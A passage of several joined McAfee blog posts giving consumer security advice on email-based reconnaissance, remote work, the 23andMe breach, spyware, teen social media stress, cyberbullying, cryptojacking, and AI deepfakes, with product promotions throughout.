An hour later, Oz responded with my work and home phone numbers, home address, birth date, and year. But the real shocker was a casual remark about my meeting with Lt. Governor Gavin Newsom, followed by a link to a picture I had no memory of sharing publicly. On clicking the link, I received another email from Oz, stating that he had discovered my preferred internet browser, my operating system, and my IP address, essentially knowing my geographical coordinates. At this point, it became crystal clear just how much information a hacker can unearth based on an email address alone.
The experience with Oz was a stark reminder of the importance of online safety. We often let our guards down, readily providing information and clicking on links without giving it a second thought. However, this is exactly the kind of behavior that hackers rely on for their activities. It is crucial to remember that the internet is a public space, and every piece of information we share can potentially be accessed and misused by malicious parties.
In the next sections of this guide, we’ll delve deeper into the mechanisms hackers use to derive information from an email and the measures you can take to secure your digital identity. The aim is to provide you with practical steps to ensure your online safety and maintain your privacy in the digital world.
When you give out your email address to a hacker, they have a significant amount of information at their fingertips. Understanding the mechanisms that hackers employ to exploit your online presence is essential to appreciate the gravity of the online safety challenge. When a hacker gains access to your email address, they effectively open the door to a wealth of information about you. Let’s find out how this works:
→ Dig Deeper: Mobile Spyware: How Hackers Can Turn Your Phone Into a Stalking Machine
Knowing these tactics highlights the importance of practicing caution and diligence when it comes to email and online interactions. Safeguarding your digital identity requires a combination of awareness, security measures, and privacy-conscious practices. It also underscores the need for robust cybersecurity measures on both individual and organizational levels to protect against these types of intrusive and potentially harmful activities.
Protecting Your Digital Identity
Knowing all this, it is imperative to find ways to protect yourself from such intrusions. In addition to knowing what makes hackers tick, there are several insights and practices you should consider to enhance your online security and privacy:
→ Dig Deeper: How to Spot Phishing Lures
McAfee Pro Tip: For your peace of mind, get McAfee+, which comes with a $2M identity theft coverage and setup assistance, to make a sound incident response plan if your email got hacked and sensitive information got compromised.
Remember that while it’s essential to take these precautions, no system is completely invulnerable. Cyber threats are continually evolving, so staying vigilant and proactive is crucial to maintaining your online security and privacy.
An email address might seem like a tiny part of your life, but in the wrong hands, it can lead to a significant breach of your privacy. It’s important to remember that the safety measures you take or fail to take can have real-world effects. Therefore, it’s crucial to keep a vigilant eye on your digital persona, how you navigate the World Wide Web, and who has access to your information. The key to internet safety lies within our control – cautious, knowledgeable, and proactive steps to protect your digital identity. At McAfee, we’re always here to remind you that the internet is only as secure as you make it.
The post If You Give A Hacker Your Email Address… appeared first on McAfee Blog.
In the shadow of the COVID-19 pandemic, workplaces worldwide have undergone a seismic shift towards remote working. This adjustment involves much more than just allowing employees to access work resources from various locations. It necessitates the update of remote working policies and heightened cybersecurity security awareness.
Cybercriminals and potential nation-states are reportedly exploiting the global health crisis for their own gain. Hackers have targeted an array of sectors, including healthcare, employing COVID-19-related baits to manipulate user behavior. This article aims to provide a comprehensive guide on how you, as an employee, can augment your cybersecurity measures and stay safe when working remotely.
It has been reported that criminals are using COVID-19 as bait in phishing emails, domains, malware, and more. While the exploitation of this global crisis is disheartening, it is unsurprising as criminals habitually leverage large events to their advantage. That said, it’s crucial to identify potential targets, particularly in certain geographic regions.
The data so far reveals a broad geographic dispersion of ‘targets,’ with many countries that are typical phishing targets being hit. However, there are anomalies such as Panama, Taiwan, and Japan, suggesting possible campaigns targeting specific countries. The landscape is continuously evolving as more threats are identified, necessitating vigilant monitoring on your part to stay safe.
→ Dig Deeper: McAfee Labs Report Reveals Latest COVID-19 Threats and Malware Surges
The abrupt shift to remote work has left many employees unprepared, with some needing to operate from personal devices. These personal devices, if lacking appropriate security measures, can expose both you and your company or employer to various potential attacks.
Over the last few years, there has been a surge in targeted ransomware attacks, particularly through “commodity malware.” This malware type is often directed at consumers. Consequently, accessing work networks from potentially infected personal devices without appropriate security measures significantly increases the risk. Both employees and employers are left vulnerable to breaches and ransomware lockdowns.
Office closures and working-from-home mandates due to COVID-19 permanently changed the way we look at workplace connectivity. A recent Fenwick poll among HR, privacy, and security professionals across industries noted that approximately 90% of employees now handle intellectual property, confidential, and personal information on their in-home Wi-Fi as opposed to in-office networks. Additionally, many are accessing this information on personal and mobile devices that often do not have the same protections as company-owned devices. The elevated number of unprotected devices connected to unsecured networks creates weak areas in a company’s infrastructure, making it harder to protect against hackers.
One technology your organization should be especially diligent about is video conferencing software. Hackers can infiltrate video conferencing software to eavesdrop on private discussions and steal vital information. Many disrupt video calls via brute force, where they scan a list of possible meeting IDs to try and connect to a meeting. Others seek more complex infiltration methods through vulnerabilities in the actual software. Up until recently, Agora’s video conferencing software exhibited these same vulnerabilities.
Hackers will usually try to gain access to these network vulnerabilities by targeting unsuspecting employees through phishing scams which can lead to even greater consequences if they manage to insert malware or hold your data for ransom. Without proper training on how to avoid these threats, many employees wouldn’t know how to handle the impact should they become the target.
If you’re an employee working remotely, it is essential to comprehend and adhere to best security practices. Here are some guidelines you could follow:
Considering the rise of remote working, it is more crucial than ever for employees, especially those working remotely, to invest in secure solutions and tools. However, as end-users, it’s also wisest to take extra steps like installing comprehensive security software to ward off cyber threats. These software have features that collectively provide a holistic approach to security, detecting vulnerabilities, and minimizing the chance of an attack.
We recommend McAfee+ and McAfee Total Protection if you want an all-inclusive security solution. With a powerful combination of real-time threat detection, antivirus, and malware protection, secure browsing, identity theft prevention, and privacy safeguards, McAfee+ and McAfee Total Protection ensure that your devices and personal information remain secure and your online experience is worry-free.
McAfee Pro Tip: Gauge your security protection and assess your security needs before you get a comprehensive security plan. This proactive approach is the foundation for establishing robust cybersecurity measures tailored to your specific requirements and potential vulnerabilities. Learn more about our award-winning security products award-winning security products.
In the current digital age, employees must be aware of their crucial role in maintaining organizational security. As such, you should consider engaging in tailored security education and training programs that help employees identify and avoid potential threats such as phishing and malicious downloads. Regular training and updates can be beneficial as employees are often the first line of defense and can significantly help mitigate potential security breaches.
To ensure effective acquisition of knowledge, engage in security training that is designed in an engaging, easy-to-understand manner and utilizes practical examples that you can relate to. Successful training programs often incorporate interactive modules, quizzes, and even games to instill important security concepts.
Effective communication and collaboration are paramount in a remote working environment. Employees need to share information and collaborate on projects effectively while ensuring that sensitive information remains secure. Use and participate in platforms that enable secure communication and collaboration. Tools such as secure messaging apps, encrypted email services, secure file sharing, and collaboration platforms will ensure information protection while allowing seamless collaboration.
Make sure that you’re provided with detailed guidelines and training on the proper use of these tools and their security features. This will help prevent data leaks and other security issues that can arise from misuse or misunderstanding.
→ Dig Deeper: Five Tips from McAfee’s Remote Workers
The transition to a remote working environment brings with it various cybersecurity challenges. Prioritizing secure communication and collaboration tools, coupled with ongoing education and adherence to best practices, can help you navigate these challenges with confidence, ultimately reaping the benefits of a flexible and efficient remote work environment while safeguarding critical data and information. McAfee can help you with that and more, so choose the best combination of features that fits your remote work setup.
The post Staying Safe While Working Remotely appeared first on McAfee Blog.
In October, a hacker claimed to have hijacked profile information of “millions” of users from the popular genetic testing site 23andMe.com. Now the company has put a figure to that – some 6.9 million people. Roughly half of 23andMe’s user base.
What’s at risk? Some of the most personal info possible. Per the company’s statement to Techcrunch, this included “the person’s name, birth year, relationship labels, the percentage of DNA shared with relatives, ancestry reports and self-reported location” for roughly 5.5 million people who opted into the “DNA Relatives” feature, which automatically shares some information with other users automatically.
→ Worried about potential ID theft? Get identity protection with McAfee+ today
Another 1.4 million users had their “Family Tree information accessed.” This further includes display names, relationship labels, birth year, self-reported location and whether the user decided to share their information.
Just as we reported initially in October, the source of the breach appears to revolve around compromised passwords in an attack method known as “credential stuffing.” In plain terms, hackers “stuff” the credentials from one account into another to gain access. It’s a prime example of the perils that can follow when people reuse passwords. A stolen password from one account can get “stuffed” into another and give the hacker access.
Complicating the attack, and widening its scope immensely, is the DNA Relatives feature mentioned above. Because of the way it shares information between users, one compromised account can divulge the personal and genetic information of many more users – even if their account and password were not compromised in the attack. In this way, a relative handful of compromised accounts affected some 6.9 users.
Per the company’s statement on its blog, “If we learn that a customer’s data has been accessed without their authorization, we will notify them directly with more information.” Moreover, the company said,
“Our investigation continues and we have engaged the assistance of third-party forensic experts. We are also working with federal law enforcement officials.
We are reaching out to our customers to provide an update on the investigation and to encourage them to take additional actions to keep their account and password secure. Out of caution, we are requiring that all customers reset their passwords and are encouraging the use of multi-factor authentication (MFA).”
Further, in November the company required its users to use MFA to further secure their accounts, which had only been optional until that point.
As unsettling as this news may come, 23andMe customers can take the following steps.
In light of the attack on 23andMe and the sensitive data it exposed, several class action lawsuits have been filed against the company. In a filing with the U.S. Securities and Exchange Commission (SEC), 23andMe stated, “multiple class action claims have been filed against the Company in federal and state court in California and state court in Illinois, as well as in British Columbia and Ontario, Canada, which the Company is defending.”
As reported by Engadget, 23andMe sent users an email in early December notifying them of a change in the company’s terms of service – specific to its Dispute Resolution and Arbitration terms. By default, users now waive their rights to bringing forward class and collective action against the company to the fullest extent allowed by applicable law:
However, concerned users of 23andMe can opt out of these terms, thus allowing them to pursue class and collective action if they see fit. Users need to send written notice of their decision to opt-out by emailing 23andMe at arbitrationoptout@23andme.com. As of this writing the terms as posted are as follows:
Once again, users can refer to Section 5 of 23andMe’s terms of service for full details and to monitor any changes the company makes to those terms.
Far and beyond 23andMe users, everyone who goes online should take note of this attack. Which is pretty much all of us. It makes one of the strongest cases for strong, unique passwords—and for limiting the info you share online. In this case, even a secure password was no help in protecting the personal info of millions of people.
If you’re a 23andMe user, you can opt out of DNA Relatives by selecting the Manage Preferences option within DNA Relatives or from your Account Settings page. Granted, this will remove your ability to gain deeper genetic insights from other users, yet it will offer additional protection if a similar attack occurs.
For all of us, sharing and storing personal info is a fact of life online. The more you share and store online, the more risk you take on. And you have some control over that.
Consider what you’re sharing, who you’re sharing it with, what they do with that info, who they share it with, and in what form and circumstances. Yes, that’s a lot to consider. Complicating that yet more, many of the sites, services, and apps we use don’t make it easy to answer those questions. Terms of service and data policies rarely make for light and understandable reading.
Luckily, you can turn to trustworthy resources to get answers. The Common Sense Privacy Program evaluates privacy policies with K-12 students in mind. The Mozilla Foundation’s Privacy Not Included website scores apps and connected devices for privacy, including apps, smart home devices, and cars.
In an otherwise murky landscape, the privacy question is this: is the reward worth the risk? If you share that info, are you okay with someone unwanted accessing it? Particularly if the privacy risks are tough to spot.
Put simply, less sharing means more privacy. Put careful thought into when and where you share. And with whom.
On that note, it might be time for a cleanup.
We’ve logged into all kinds of things over the years. Many of which we don’t log into anymore. And others we’ve completely forgotten about. Across these forums, sites, and stores, you’ll find your personal info to some degree or other. If one of those sites gets compromised, your personal info stored there might get compromised too. That gives you a solid reason to delete those old accounts.
A tool like our Online Account Cleanup can help remove your info from online accounts. You’ll find it in our online protection software, along with our Personal Data Cleanup—which helps remove your personal info from risky data broker sites. It shows you where your personal info was found, and what data the sites have. Depending on your plan, it can help clean it up.
With 6.9 million people affected by the 23andMe attack, it reinforces a big lesson: strong, unique passwords are an absolute must. And the stakes for online privacy have never been higher.
Today we entrust the internet with so much, which increasingly includes our heath and wellness info, not to mention genetic info with services like 23andMe. Taking the steps outlined here can help protect yourself from invasions of privacy and the loss of personal info. And as we’ve seen, protect others too. Consider them whether you’re a 23andMe customer or not.
The post User Data from 23andMe Leaked Online – What Users Should Do, and the Rest of Us Too appeared first on McAfee Blog.
Spyware, a name that cunningly blends “spying” and “software,” is a dangerous class of invasive programs that stealthily operate on your computer. They monitor and record your activities, thus posing a significant threat to your digital privacy, security, and identity. Spyware can lead to identity theft if your personal or financial data falls into the wrong hands. This guide provides in-depth information about spyware, how it works, and how to prevent it from infecting your computer system.
Spyware is a type of malicious software that collects information about users without their knowledge. It can track every action, from keystrokes to browsing habits, thus presenting a grave threat to user privacy and security.
Designed to be stealthy and elusive, spyware can record every keystroke, capture screenshots, and even record audio and video, making it a potent tool for cybercriminals. It is often transmitted through free downloads, file-sharing programs, or deceptive links and websites.
In certain situations, spyware is perfectly legal. For example, when the owner of the computer installs and uses the software, it’s considered legal. Parents might install spyware to monitor their children’s online activities or employers to oversee their employees’ productivity.
However, when someone installs spyware on a computer without the owner’s consent, it becomes illegal. Cybercriminals often disguise spyware as legitimate programs or embed them in websites, tricking users into downloading or clicking, resulting in the stealthy installation of spyware.
→ Dig Deeper: Malware Hides in Installer to Avoid Detection
Spyware can take several shapes and forms, and its diversity makes it even more dangerous. A common form of spyware is a keylogger or a keycatcher. This hardware can be attached to a computer to capture and record keystrokes. This device can monitor user activity without being detected by typical anti-spyware software.
Spyware can also come in the form of a computer virus. When users click on a malicious link or download a corrupted program, they unknowingly install spyware on their system. Once installed, the spyware works silently in the background, capturing and transmitting user data to the attacker.
Spyware’s pervasive threat extends beyond computers and laptops; it can also manifest as mobile spyware. Mobile spyware operates similarly to its desktop counterparts but is tailored to exploit the unique characteristics of mobile platforms. Cybercriminals often employ various tactics to deliver mobile spyware–through application stores like Google Play and App Store, phishing attacks, or physical access.
→ Dig Deeper: Mobile Spyware: How Hackers Can Turn Your Phone Into a Stalking Machine
The adaptability and constantly evolving nature of spyware make it a persistent menace in the digital landscape. Its ability to take on various forms and exploit vulnerabilities underscores the importance of proactive cybersecurity measures.
The impact of spyware on identity theft cannot be understated. By stealthily recording sensitive personal and financial information, like usernames, passwords, and credit card numbers, it presents a significant risk to a user’s identity.
Stolen data can be used for various malicious activities, including unauthorized purchases, opening credit accounts, and even creating a complete identity theft. The consequences of these activities can be financially devastating and may take a significant amount of time and effort to recover from.
McAfee Pro Tip: Identity theft remains a significant problem in the United States, and there is no sign of it diminishing soon. Reports of fraud consistently indicate a continuous increase in the occurrences of identity theft in the U.S. Read the latest Identity Theft statistics.
Preventing spyware from infecting your system starts with practicing good online habits. Avoid downloading files from untrusted sources, especially torrents and software cracks notorious for being riddled with spyware. Also, be wary of pop-ups. Never click “Agree,” “OK,” “No,” or “Yes” in a pop-up, as these actions can trigger an automatic spyware download. Instead, close the pop-up by hitting the red X or shutting down your browser altogether.
Regularly updating your operating system’s security patches is another good practice. These patches often contain fixes to known vulnerabilities that spyware and other malicious programs exploit. Also, ensure to download and use your web browser’s latest, most secure version. Running reputable anti-malware programs, like McAfee Total Protection, which includes spyware removal, can help to detect and remove spyware from your system.
→ Dig Deeper: How to Live a Digital Life Free of Spyware
If you suspect your system is infected with spyware, you must act swiftly. Use a trusted antivirus program to run a system scan. If spyware is detected, the program should be able to quarantine and remove it. However, some forms of spyware are advanced and may be able to avoid detection. In such instances, it may be necessary to engage a professional to clean your system.
Part of dealing with a spyware infection is mitigating its potential effects. If your sensitive data has been compromised, consider implementing measures to protect your identity. McAfee Identity Protection provides proactive identity surveillance, which monitors your credit and personal information for fraudulent activities. If any such activity is detected, it offers access to live fraud resolution agents, who can help you resolve identity theft issues.
→ Dig Deeper: How to Wipe Out a Computer Virus
Spyware significantly threatens your digital identity, privacy, and security. It stealthily operates in the background, recording and transmitting your activities and personal information. While it can be a valuable tool for legal monitoring, its misuse by cybercriminals cannot be underestimated. Preventing and dealing with spyware requires vigilance, good online habits, and the use of trusted antivirus programs like McAfee Antivirus. Protecting your digital identity is not a one-time task but an ongoing process. Stay informed, stay updated, and stay safe.
The post Spyware: A Major Identity Theft Threat appeared first on McAfee Blog.
In today’s world, most communication happens through the internet, facilitated by numerous applications. The web is a lively center filled with various activities such as news, videos, education, blogs, gaming, activism, and entertainment. Notably, social media apps have morphed into the digital meeting points for netizens. Our society is undeniably superbly interconnected, and our digital persona is greatly treasured.
However, this isn’t always beneficial, especially for teenagers who may be overwhelmed by the deluge of information, leading to stress. Stress is a common part of our daily lives, emerging from our education, employment, relationships, and surroundings. A similar situation transpires online. In fact, we tend to cope with stress by expressing our frustrations, confronting problems directly, or evading the issue altogether. Yet, the ways to cope with stress in the virtual world differ. Online stress can arise from unique triggers, and its repercussions can rapidly escalate and proliferate at an alarming rate.
The rise of social media has brought a concerning phenomenon – social media stress in children. As these young individuals navigate the complex virtual world, they often encounter a range of stressors that can significantly impact their emotional and psychological well-being. Understanding these underlying causes is a crucial step in addressing and mitigating the adverse effects of social media on our younger generations. Let’s delve into the causes of social media stress in children and shed light on the various factors that contribute to this growing issue:
Besides the more obvious and well-documented sources of social media stress in children, there exist several other significant triggers that contribute to the overall stress levels experienced by young individuals in the digital age, and these may include:
→ Dig Deeper: The Ultimate Guide to Safe Sharing Online
→ Dig Deeper: More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report
→ Dig Deeper: 5 Screen Time Principles to Establish When Your Kids are Still Babies
Parenting plays a major role in helping children learn how to tackle social media stress. As parents, you know your children the best. Yes, even teens. Observe them, and if you note any change in their social media habits or general behavior, talk to them. The earlier you start having frank one-to-one conversations, the easier it will be for you later. But before that, you may need to modify your response to stress and learn to control your reactions. That way, you will teach them a very important lesson without using a single word.
Children can learn to manage social media stress by developing a healthy online etiquette and creating boundaries for their online activities. Encourage them to accept differences and realize that people have varied opinions. Remind them not to make judgments based on someone’s online bio and pictures and to understand that life isn’t a bed of roses for anyone. Another important step is to help them understand how important it is to respond tactfully when things get heated online. It’s essential that they understand the power of choosing not to engage in online altercations. Being silent doesn’t mean they’re weak but smart enough not to get provoked. If any online situation becomes too intense, they should be encouraged to report and block the perpetrator immediately.
McAfee Pro Tip: Since each child’s level of maturity and cognitive capacity to manage online challenges varies, a one-site-fits-all approach to balancing social media and mental health won’t work for everyone. Find tips on how to find the best method for your child.
One of the keys to managing stress caused by social media is ensuring that kids practice digital balance. Set screen time limits and encourage them to make and maintain friendships in the real world. In-person interactions promote emotional growth and provide a well-rounded social experience. Moreover, it’s crucial to instill the idea that maturity is about staying true to their values and wisdom lies in identifying the negatives and avoiding them. Just as they would in the physical world, they should be aware that the digital world comprises both good and bad elements. This awareness can help them navigate online spaces safely. Let them know the importance of applying their real-life values in the digital world and the mantra of STOP, THINK, CONNECT, should always be in their mind before posting anything online.
→ Dig Deeper: 6 Steps to Help Your Family Restore Digital Balance in Stressful Times
In conclusion, parents play a crucial role in helping their children tackle social media stress. By observing their kids’ behavioral changes, having open conversations, and setting appropriate boundaries for their online activities, parents can help their kids navigate the digital world safely. Encouraging children to accept differences, practice tact, maintain digital balance, and be aware of the good and bad online can help alleviate the stress caused by social media. Ultimately, the goal is to create a healthier and happier online space for children, free from unnecessary stress.
Improve your digital parenting with McAfee’s Parental Controls. This security tool allows parents to monitor device usage, set limits on screen time, and even keep tabs on kids’ whereabouts.
The post Handling Social Media Stress for Teens appeared first on McAfee Blog.
As we all look forward to the sunshine and freedom of summer, it’s important to remember that not all elements of the school year disappear with the ringing of the final bell. In our increasingly digital age, cyberbullying has become a pervasive issue that can affect kids even during their summer break. This guide will help parents understand the issue, recognize the signs, and provide practical strategies to protect their kids from cyberbullies.
Summer break should be a time of fun-filled days, exploration, relaxation, and a break from the rigors of the school year. However, with the increase in leisure time comes a corresponding increase in screen time, and, unfortunately, this often results in an uptick in instances of cyberbullying. As the McAfee survey in 2014 revealed, 87% of teenagers reported witnessing cyberbullying, a significant increase from the previous year. The reasons for being targeted varied, with appearance, race, religion, and sexual orientation all cited as factors. Given this reality, parents must remain vigilant during the summer months. Keeping an eye on your child’s online activities, encouraging open communication, and intervening when necessary can make the difference between a summer of fun and one of fear and isolation. → Dig Deeper: More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report
When confronted with bullying, our instinctive reactions aren’t always the best. Here are three things you should avoid doing when addressing cyberbullying:
Prevention is the best cure, and there are several proactive steps you can take to minimize the risk of your child being cyberbullied:
→ Dig Deeper: Protecting Your Privacy on Social Media
→ Dig Deeper: Beware of Malicious Mobile Apps
Despite taking precautions, there may be instances where cyberbullying can’t be immediately prevented. In such situations, it is crucial to know what steps to take to mitigate the impact and bring the bullying to an end:
Addressing the issue of cyberbullying can be a complex task. The emotional wounds inflicted by this abuse can be deep and long-lasting. Therefore, it’s indispensable that your child feels supported and understood. Maintain an open line of communication with your child, creating a secure and trusting environment where they can comfortably express their feelings and fears. It might also be beneficial to seek professional help when dealing with cases of severe bullying. Therapy or counseling can provide your child with effective coping strategies, helping them regain their confidence and self-esteem. McAfee Pro Tip: While numerous aspects of the digital world remain beyond our control, one aspect where we wield significant influence is our commitment to protecting the well-being of our family members in both the digital and mental realms. Mental health always matters. Find ways to support your child online and offline.
Preventing cyberbullying starts at home. By teaching our children the values of empathy and respect, we can contribute to a more positive online culture. Incorporate digital citizenship lessons into your everyday conversations, emphasizing the importance of treating others kindly offline and online. Teach your children to think before they post and remind them that behind every screen, there’s a real person who can be hurt by their words. Building respect and empathy can discourage cyberbullying and inspire children to stand against it. → Dig Deeper: Cyberbullying’s Impact on Both Society and Security
Parenting in the digital age brings with it new challenges and responsibilities. Cyberbullying is a significant issue that requires our attention and vigilance, especially during the summer when screen time increases. Equip your child with the right tools to protect themselves online, foster open communication at all times, and support them in the face of adversity. Remember, the goal is for our children to enjoy their digital interactions and have a safe, enjoyable summer free from the threat of cyberbullying. Improve your family’s digital habits, privacy, and safety with McAfee’s Parental Controls. This security tool allows parents to oversee device usage, establish screen time restrictions, and even track the locations of their children.
The post Help Kids Steer Clear of Cyberbullies During Summer Break appeared first on McAfee Blog.
Your pain is their gain. That’s how things go in a cryptojacking attack.
Cryptomining is the utilization of computers to run processor-intensive computations to acquire cryptocurrency. Cryptojacking involves hijacking a device and using it to mine cryptocurrency for profit. It’s a form of malware that saps your device’s resources, making it run sluggish and potentially overheating it as well.
Meanwhile, the hackers behind those attacks generate cryptocurrency by hijacking your device and thousands of others like it. Together they create virtual illicit networks that turn them a profit.
However, you can absolutely prevent it from happening to you. That starts with a closer look at who’s behind it and how they pull it off.
What lures hackers to cryptojacking? It’s big business. Gone are the early days when practically anyone with a standard computer could participate in the cryptomining process. Today, the proverbial field is flooded with miners competing against each other to solve the cryptographic puzzles that earn a cryptocurrency reward. Profitable miners run farms of dedicated mining rigs that cost thousands of dollars each.
Visualize row after row of racks after racks stacked with mining rigs in hyper-cooled warehouses. That’s what industrialized cryptomining looks like nowadays.
To put it all into perspective, one study estimated that “(t)he top 10% of [Bitcoin] miners control 90% and just 0.1% (about 50 miners) control close to 50% of mining capacity.” That makes cryptomining a difficult field to break into. And that’s why some people cheat.
Enter the cryptojackers. These hackers forgo the massive up-front and ongoing costs of a cryptomining farm. Instead, they build their cryptomining operations off the backs of other people by hijacking or “cryptojacking” their devices. In doing so, they leach the computing resources of others to mine their cryptocurrency.
Cryptojackers will target just about anyone—individuals, companies, and governmental agencies. They’ll infiltrate phones, laptops, and desktops. In larger instances, they’ll go after large server farms or an organization’s cloud infrastructure. This way, they get the computing power they need. Illegally.
As to how cryptojackers pull that off, they have a couple of primary options:
What can that look like in the real world? We’ve seen Android phones harnessed for cryptomining after downloading malicious apps from Google Play. Cryptojackers have created counterfeit versions of popular computer performance software and infected it with cryptojacking code. We’ve also seen cryptojackers tap into the computing power of internet of things (IoT) and smart home devices as well.
Interestingly enough, the rate of cryptojacking attacks is closely tied to the vagaries of the marketplace. As the value of cryptocurrencies rise and fall, so does cryptojacking. The crooks behind these hacks go where they get the biggest bang for their buck. So as cryptocurrencies drop in value, these crooks drop their cryptojacking attacks. They opt for other attacks that offer a higher return on the resources they invest.
Despite its cyclic nature, cryptojacking remains a stubborn problem. Yet you can do plenty to prevent it from happening to you.
Unlike Google Play and Apple’s App Store, which have measures in place to review and vet apps to help ensure that they are safe and secure, third-party sites might very well not. Further, some third-party sites might intentionally host malicious apps as part of a broader scam.
Granted, hackers have found ways to work around Google and Apple’s review process, yet the chances of downloading a safe app from them are far greater than anywhere else. Further, Google and Apple are quick to remove malicious apps when discovered, making their stores that much safer.
Comprehensive online protection software like ours can protect you in several ways. First, our AI-powered antivirus detects, blocks, and removes malware—new and old. This can protect you against the latest cryptojacking attacks. Further, it includes web protection that blocks malicious sites, such as the ones that host web-based cryptojacking attacks. In all, comprehensive online protection software offers a strong line of defense.
Whether cryptojackers try to reach you by email (phishing) or text (smishing), our new McAfee Scam Protection can stop those attacks dead in their tracks. Using the power of AI, McAfee Scam Protection can alert you when scam texts pop up on your device or phone. No more guessing if a text is real or not. Further, it can block risky sites if you accidentally follow a scam link in a text, email, social media, and more.
While hackers love pilfering the computing resources of large organizations, their cryptojacking attacks still target everyday folks. Just as is the case with ransomware, hackers will seek to make their money in volume. Targeting under-protected households can still reap plenty of cryptocurrency when hackers do so in numbers.
Protecting yourself is relatively easy. Several of the same general steps you take to protect yourself online offer protection from cryptojacking attacks as well. Stick to legitimate app stores, use the tools that can quash spammy emails and texts, and go online confidently with online protection software. Nobody should make a fast buck off you. Particularly a cryptojacker.
The post Cryptojacking – Stop Hackers from Making Money Off You appeared first on McAfee Blog.
As AI deepfakes and malware understandably grab the headlines, one thing gets easily overlooked—AI also works on your side. It protects you from fraud and malware as well.
For some time now, we’ve kept our eye on AI here at McAfee. Particularly as scammers cook up fresh gluts of AI-driven hustles. And there are plenty of them.
We’ve uncovered how scammers need only a few seconds of a voice recording to clone it using AI—which has led to all manner of imposter scams. We also showed how scammers can use AI writing tools to power their chats in romance scams, to the extent of writing love poems with AI. Recently, we shared word of fake news sites packed with bogus articles generated almost entirely with AI. AI-generated videos even played a role in a scam for “Barbie” movie tickets.
Law enforcement, government agencies, and other regulatory bodies have taken note. In April, the U.S. Federal Trade Commission (FTC) warned consumers that AI now “turbocharges” fraud online. The commission cited a proliferation of AI tools can generate convincing text, images, audio, and videos.
While not typically malicious in and of themselves, scammers twist these technologies to bilk victims out of their money and personal information. Likewise, just as legitimate application developers use AI to create code, hackers use AI to create malware.
There’s no question that all these AI-driven scams mark a major change in the way we stay safe online. Yet you have a powerful ally on your side. It’s AI, as well. And it’s out there, spotting scams and malware. In fact, you’ll find it in our online protection software. We’ve put AI to work on your behalf for some time now.
With a closer look at how AI works on your side, along with several steps that can help you spot AI fakery, you can stay safer out there. Despite the best efforts of scammers, hackers, and their AI tools.
One way to think about online protection is this: it’s a battle to keep you safe. Hackers employ new forms of attack that try to work around existing protections. Meanwhile, security professionals create technological advances that counter these attacks and proactively prevent them—which hackers try to work around once again. And on it goes. As technology evolves, so does this battle. And the advent of AI marks a decidedly new era in the struggle.
As a result, security professionals also employ AI to protect people from AI-driven attacks.
Companies now check facial scans for skin texture and translucency to determine if someone is using a mask to trick facial recognition ID. Banks employ other tools to detect suspicious mouse movements and transaction details that might be suspicious. Additionally, developers scan their code with AI tools to detect vulnerabilities that might lurk deep in their apps—in places that would take human teams hundreds, if not thousands of staff hours to detect. If at all. Code can get quite complex.
For us, we’ve used AI in our online protection for years now. McAfee has used AI for evaluating events, files, and website characteristics. We have further used AI for detection, which has proven highly effective against entirely new forms of attack.
We’ve also used these technologies to catalog sites for identifying sites that host malicious files or phishing operations. Moreover, cataloging has helped us shape out parental control features such that we can block content based on customer preferences with high accuracy.
And we continue to evolve it so that it detects threats even faster and yet more accurately than before. Taken together, AI-driven protection like ours quashes threats in three ways:
What does AI-driven protection look like for you? It can identify malicious websites before you can connect to them. It can prevent new forms of ransomware from encrypting your photos and files. And it can keep spyware from stealing your personal information by spotting apps that would connect them to a bad actor’s command-and-control server.
As a result, you get faster and more comprehensive protection with AI that works in conjunction with online protection software—and our security professionals develop them both.
Yet, as it is with any kind of scam, it can take more than technology to spot an AI-driven scam. It calls for eyeballing the content you come across critically. You can spot an AI-driven scam with your eyes, along with your ears and even your gut.
Take AI voice clone attacks, for example. You can protect yourself from them by taking the following steps:
As AI continues its evolution, it gets trickier and trickier to spot it in images, video, and audio. Advances in AI give images a clarity and crispness that they didn’t have before, deepfake videos play more smoothly, and voice cloning gets uncannily accurate.
Yet even with the best AI, scammers often leave their fingerprints all over the fake news content they create. Look for the following:
1) Consider the context
AI fakes usually don’t appear by themselves. There’s often text or a larger article around them. Inspect the text for typos, poor grammar, and overall poor composition. Look to see if the text even makes sense. And like legitimate news articles, does it include identifying information — like date, time, and place of publication, along with the author’s name.
2) Evaluate the claim
Does the image seem too bizarre to be real? Too good to be true? Today, “Don’t believe everything you read on the internet,” now includes “Don’t believe everything you see on the internet.” If a fake news story is claiming to be real, search for the headline elsewhere. If it’s truly noteworthy, other known and reputable sites will report on the event—and have done their own fact-checking.
3) Check for distortions
The bulk of AI technology still renders fingers and hands poorly. It often creates eyes that might have a soulless or dead look to them — or that show irregularities between them. Also, shadows might appear in places where they look unnatural. Further, the skin tone might look uneven. In deepfaked videos, the voice and facial expressions might not exactly line up, making the subject look robotic and stiff.
The battle between hackers and the people behind online protection continues. And while the introduction of AI has unleashed all manner of new attacks, the pattern prevails. Hackers and security professionals tap into the same technologies and continually up the game against each other.
Understandably, AI conjures questions, uncertainty, and, arguably, fear. Yet you can rest assured that, behind the headlines of AI threats, security professionals use AI technology for protection. For good.
Yet an online scam remains an online scam. Many times, it takes common sense and a sharp eye to spot a hustle when you see one. If anything, that remains one instance where humans still have a leg up on AI. Humans have gut instincts. They can sense when something looks, feels, or sounds …off. Rely on that instinct. And give yourself time to let it speak to you. In a time of AI-driven fakery, it still stands as an excellent first line of defense.
The post How to Win the Battle Against Deepfakes and Malware appeared first on McAfee Blog.
Maybe you do armloads of shopping on it. Maybe you skip going to the bank because you can tackle the bulk of your finances online. And perhaps you even pay your doctor a visit with it, instead of taking a trip to their office.
The way we use the internet has changed. We rely on it for a wealth of important things. Now more than ever, which makes Cybersecurity Awareness Month more important than ever.
Every October, we proudly take part in Cybersecurity Awareness Month. In partnership with the U.S. Cybersecurity and Infrastructure Agency (CISA) and a host of organizations in the private sector, we shed light on an essential topic—a safer internet.
The time of the internet as a novelty has long passed. The internet isn’t just nice. It’s essential. To the point that it’s a utility, like power or water. With that, a safe internet is a must.
Granted, amid news of data breaches and major hacks, it might seem like the notion of a safer internet is out of your hands. After all, what can you do to make the internet a safer place?
Plenty.
Extra awareness and a few straightforward actions can make your time online far safer than before. And that’s a common theme here on our blog. Even as new threats appear daily, you live in a time where you have some of the most comprehensive and easy-to-use tools to combat them—and keep yourself safe.
With that, Cybersecurity Awareness Month comes with a quick five-step checklist you can run through. Set aside some time this month to knock out each item. You’ll find yourself much more secure from hacks, attacks, and identity theft in the wake of data breaches.
Let’s dive in.
